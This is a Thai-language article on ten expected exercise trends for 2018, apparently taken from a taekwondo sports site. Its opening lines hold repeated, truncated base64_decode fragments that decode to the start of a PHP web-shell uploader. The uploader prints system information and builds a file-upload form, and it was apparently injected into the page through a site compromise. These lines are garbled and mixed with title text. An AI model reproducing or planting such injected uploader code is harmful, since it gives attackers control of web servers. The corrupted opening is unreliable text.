".base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5TdHlsZTwvdGl0bGU+JzsgDQplY2hvIHBocF91bmFtZSgpOyANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7IA0KZWNobyAnPGlu ,เทควันโด, Taekwondo"> ".base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5TdHlsZTwvdGl0bGU+JzsgDQplY2hvIHBocF91bmFtZSgpOyANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7IA0KZWNobyAnPGlu,เทควันโด, Taekwondo">

".base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5TdHlsZTwvdGl0bGU+JzsgDQplY2hvIHBocF91bmFtZSgpOyANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7IA0KZWNobyAnPGlu


ออกกำลังกาย
 

          เทรนด์ออกกำลังกายปี 2018 มีวิธีออกกำลังกายแบบไหนที่คาดว่าจะมาแรงบ้าง คนที่ออกกำลังกายเป็นประจำ หรือว่าได้ตั้งปณิธานว่าจะออกกำลังกายอย่างจริงจังในปี 2561 ลองมาดูกันค่ะว่าทั่วโลกกำลังจับตามองเทรนด์ออกกำลังกายแบบไหนกันอยู่

          เห็นได้ชัดว่าในยุคนี้คนรักสุขภาพมีแนวโน้มเพิ่มขึ้นทุกวัน มีคนรักการออกกำลังกายมากขึ้น และแน่นอนว่าเทรนด์การออกกำลังกายใหม่ ๆ ก็มีออกมาอยู่ตลอดทั้งปี แต่ในปีหน้าวิธีออกกำลังกายแบบไหนจะอิน และการออกกำลังกายแบบไหนจะเอาท์ เรามาดูเทรนด์ออกกำลังกายปี 2018 กันดีกว่าค่ะ แนวโน้มจะเป็นยังไง คนรักการออกกำลังกายจับตากันไว้แต่เนิ่น ๆ เลย
 

ออกกำลังกาย


1. ความสนุก+การออกกำลังกาย    

          จะเห็นได้ว่ามีวิธีออกกำลังกายที่พยายามเพิ่มความสนุกเร้าใจลงไปด้วย เช่น คลาสซุมบ้า หรือคาร์ดิโอแดนซ์ เป็นเทรนด์ออกกำลังกายที่มาแรงตั้งแต่ช่วงปี 2015 ทว่าเทรนด์ออกกำลังกายในปี 2018 ก็มีการคาดเดากันค่ะว่า วิธีออกกำลังกายที่เน้นความสนุกในระหว่างการออกกำลังกายจะมาแรงมากขึ้น ยกตัวอย่างเช่น การผสมผสานท่าเต้นบนลู่วิ่ง หรือการกระโดดเชือก ฮูลาฮูป สิ่งที่เป็นการเล่นกึ่งการออกกำลังกายจะรีเทิร์นกลับมาอีกครั้ง แต่จะมีเทคนิคสนุก ๆ อะไรเติมแต่งให้แตกต่างออกไปจากเดิมบ้าง ก็คงต้องรอดูกันต่อไป

2. HIIT ยังฮิตอยู่

          วิธีออกกำลังกายแบบ HIIT หรือ High-Intensity Interval Training เป็นวิธีการออกกำลังกายสไตล์คาร์ดิโอที่ผสมผสานกันระหว่างการออกกำลังกายอย่างหนักและการออกกำลังกายเบา ๆ สลับกันไป ซึ่งการวิจัยที่จัดทำขึ้นโดย The American College of Sports Medicine หรือ ACSM พบว่า การออกกำลังกายชนิดนี้เป็นการออกกำลังกายที่เป็นเทรนด์ออกกำลังยอดนิยมตั้งแต่ปี 2014 และคาดว่าเทรนด์ออกกำลังกาย ปี 2018 ก็ยังจะฮิต HIIT กันอยู่ เนื่องจากค่อนข้างตอบโจทย์ไลฟ์สไตล์ของคนในยุคนี้ ออกกำลังกายไม่กี่นาที แต่เบิร์นแคลอรีได้มากมาย

          - HIIT วิธีออกกำลังกายสูตรเด็ด รีดไขมันได้ใน 20 นาที
 

 
ออกกำลังกาย
 
ภาพจาก unsplash


3. Boxing ดีจริงจนได้อยู่ต่อ

          คาร์ดิโอที่เรียกเหงื่อ เบิร์นแคลอรี และให้ความสนุกปนเหนื่อยได้สุดยอดก็ต้องไว้ใจ Boxing เลยค่ะ เพราะการต่อยมวยได้มูฟเยอะ ได้ออกท่าทางอีกมากมาย แถมยังเล่นได้ทั้งหญิงและชาย คอร์สมวยลดน้ำหนัก หรือฟิตกล้ามเนื้อเลยได้อยู่ต่อ เป็นเทรนด์ออกกำลังกายที่หลายคนยังติดใจในปี 2018

4. คลาสออกกำลังกายแบบกลุ่มก็น่าจับตามอง

          ในปี 2018 เราอาจจะได้เห็นคลาสออกกำลังกายแบบกลุ่มในรูปแบบที่หลากหลายมากขึ้น เพราะอย่างที่บอกค่ะว่า เทรนด์ออกกำลังกายในปี 2018 น่าจะเน้นความสนุกสนานผสมผสานไปกับการออกกำลังกายเพื่อสุขภาพ มากกว่าการออกกำลังกายแบบเดี่ยว ๆ หรือการออกกำลังกายกับเทรนเนอร์ตัวต่อตัว โดยนักสำรวจให้เหตุผลว่า การออกกำลังกายแบบกลุ่มจูงใจให้คนอยากออกกำลังกายได้ดีกว่า อีกทั้งยังเพิ่มความสนุกสนาน และมีการแลกเปลี่ยนเทคนิคการออกกำลังระหว่างกันได้อีกต่างหาก เทรนด์ออกกำลังกายแบบกลุ่มจึงเป็นวิธีออกกำลังกายที่น่าจะบูมไม่เบาในปี 2018
 

ออกกำลังกาย
 
ภาพจาก pixabay


5. เทคโนโลยีจะฮิตกว่าเดิม

          จากการสำรวจของ The American College of Sports Medicine หรือ ACSM เผยให้เห็นว่า ไม่ว่าจะเป็นแอพพลิเคชั่นออกกำลังกาย หรืออุปกรณ์ไอทีที่เกี่ยวกับการออกกำลังกาย จะเป็นที่นิยมมากขึ้นในปี 2018 โดยเราน่าจะได้เห็นคนออกกำลังกายสวมใส่อุปกรณ์ไฮเทคเหล่านี้มากขึ้นกว่าปีที่ผ่าน ๆ มา เนื่องจากเทคโนโลยีที่สร้างขึ้นมาเพื่อช่วยเสริมการออกกำลังกายมีให้เลือกหลากหลายขึ้น ราคาก็เอื้อมถึงมากขึ้น และด้วยการแข่งขันทางการตลาด แต่ละแบรนด์ก็จะมีความพยายามเพิ่มประสิทธิภาพในการใช้งาน คนที่ได้ผลประโยชน์มากสุดก็คือผู้บริโภคอย่างเรา ๆ ได้ของดีในราคาที่เหมาะสม ใครล่ะจะอดใจไม่ซื้อมาใช้ได้

6. ไลฟ์สดท่าออกกำลังกาย

          มาค่ะ ! ปี 2018 เราอาจได้เห็นการไลฟ์สดสอนท่าออกกำลังกาย หรือไลฟ์สดชวนกันออกกำลังกายกันบ้าง และเชื่อว่าเทรนด์นี้ก็น่าจะมาแรงไม่แพ้เทรนด์ใช้เทคโนโลยี เพราะนี่ก็เป็นการใช้ประโยชน์จากเทคโนโลยีในรูปแบบหนึ่งที่สะดวก เซฟค่าใช้จ่าย ออกกำลังกายเองที่บ้านก็ได้อีกต่างหาก

7. ออกกำลังกายกับสัตว์เลี้ยง

          โยคะแมวก็มีให้เห็นบ้างแล้ว หรือจะเป็นการออกกำลังกายไปจิบเบียร์ไปก็ยังมี แต่ในปี 2018 หลายสำนักก็คาดเดากันว่า คนจะนิยมออกกำลังกายกับสัตว์เลี้ยงเพิ่มมากขึ้น เพราะสัตว์เลี้ยงจะช่วยเพิ่มความเพลิดเพลินระหว่างการออกกำลังกาย เหล่าทาสแมว ทาสน้องหมาสี่ขาก็น่าจะแฮปปี้กับการออกกำลังกายในรูปแบบนี้ไม่เบา
 

ออกกำลังกาย
 
ภาพจาก unsplash


8. บอดี้เวทยังติดอันดับ

          บอดี้เวทเป็นวิธีออกกำลังกายที่ไมต่จำเป็นต้องใช้อุปกรณ์ให้ยุ่งยาก เน้นการใช้ร่างกายของเราล้วน ๆ และผลลัพธ์ของการออกกำลังกายแบบบอดี้เวทก็แจ่มซะด้วยสิคะ หลายคนทำแล้วลีน มีกล้ามเนื้อ ลดไขมัน ฟิตหุ่นได้เป๊ะเว่อร์วังแค่ทำบอดี้เวทเป็นประจำ ดังนั้นก็ไม่ต้องแปลกใจหากเทรนด์บอดี้เวทจะได้อยู่ต่ออีกสักปีหรืออีกหลาย ๆ ปี

          - 10 คลิปท่าบอดี้เวทรีดไขมัน เฟิร์มกล้ามเนื้อในเวลาสั้น ๆ แต่ละท่าไม่เกิน 5 นาที
 

ออกกำลังกาย
 
ภาพจาก unsplash


9. โยคะ

          อีกหนึ่งวิธีออกกำลังกายที่ฮิตไม่หยุด ฮอตไม่เลิกก็คือโยคะนี่แหละค่ะ  อาจจะด้วยความที่โยคะเหมาะกับคนทุกวัย แก้ปัญหาสุขภาพได้ และยังเป็นการออกกำลังกายไปในตัว โยคะเลยเป็นทางเลือกการออกกำลังกายเพื่อสุขภาพ พร้อมกับเป็นทางเลือกของคนที่มองหาวิธีออกกำลังกายลดน้ำหนักไปด้วย คุ้มในคุ้มเลยเป็นอีกเทรนด์ออกกำลังกายติดอันดับในปี 2018 ได้ชิล ๆ 

10. ออกกำลังกายยกครัว

          นอกจากเทรนด์ออกกำลังกายเป็นกลุ่มแล้ว ปี 2018 เราอาจได้เห็นการออกกำลังกายแนว Family Workout ที่ทุกคนในบ้านชวนกันมาออกกำลังกายกันมากขึ้น บอกแล้วว่าใคร ๆ ก็รักสุขภาพ รักการออกกำลังกายเพื่อสุขภาพกันทั้งนั้น

          ไม่ว่าจะเป็นเทรนด์ออกกำลังกายแบบไหนก็ตาม เราเชื่อว่าแค่คิดอยากจะออกกำลังกาย มีกำลังใจ มีแรงบันดาลใจ และเริ่มต้นออกกำลังกาย ยังไงสุขภาพที่ดี รูปร่างที่ดี ก็อยู่กับเราแน่นอนค่ะ    

        
ขอขอบคุณข้อมูลจาก
dailymail
businessinsider
wtop

Comments

THANNAM TAEKWONDO SPORT

เรารวบรวมข่าวสาร วงการกีฬาเทควันโด และการกีฬาต่อสู้ MArtial Art ทุกประเภท รวบรวม การแข่งขันในประเภทกีฬาต่าง ระบบการจัดการ สมัครแข่งขันออนไลน์ ในทุกกีฬา.